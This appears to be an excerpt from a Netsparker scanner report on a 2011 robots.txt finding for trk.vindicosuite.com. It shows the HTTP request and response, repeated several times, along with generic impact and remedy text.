User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 12 Feb 2011 20:10:42 GMT
ETag: "5dd76016e8a6cb1:0"
Last-Modified: Tue, 28 Dec 2010 23:36:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 139
Connection: keep-alive
# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism
User-agent: *
Disallow: /
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 12 Feb 2011 20:10:42 GMT
ETag: "5dd76016e8a6cb1:0"
Last-Modified: Tue, 28 Dec 2010 23:36:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 139
Connection: keep-alive
# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism
User-agent: *
Disallow: /
Robots.txt Identified
Robots.txt Identified
1
TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a possibly sensitive
Robots.txt file with potentially sensitive content.
Impact
Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.
Remedy
- If disallowed paths are sensitive, do not write them in the
robots.txtand ensure that they correctly protected by means of authentication.
|
- /robots.txt
/robots.txt CONFIRMED |
Interesting Robots.txt Entries
- Disallow: /
Request
GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 12 Feb 2011 20:10:42 GMT
ETag: "5dd76016e8a6cb1:0"
Last-Modified: Tue, 28 Dec 2010 23:36:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 139
Connection: keep-alive
# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism
User-agent: *
Disallow: /
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 12 Feb 2011 20:10:42 GMT
ETag: "5dd76016e8a6cb1:0"
Last-Modified: Tue, 28 Dec 2010 23:36:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 139
Connection: keep-alive
# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism
User-agent: *
Disallow: /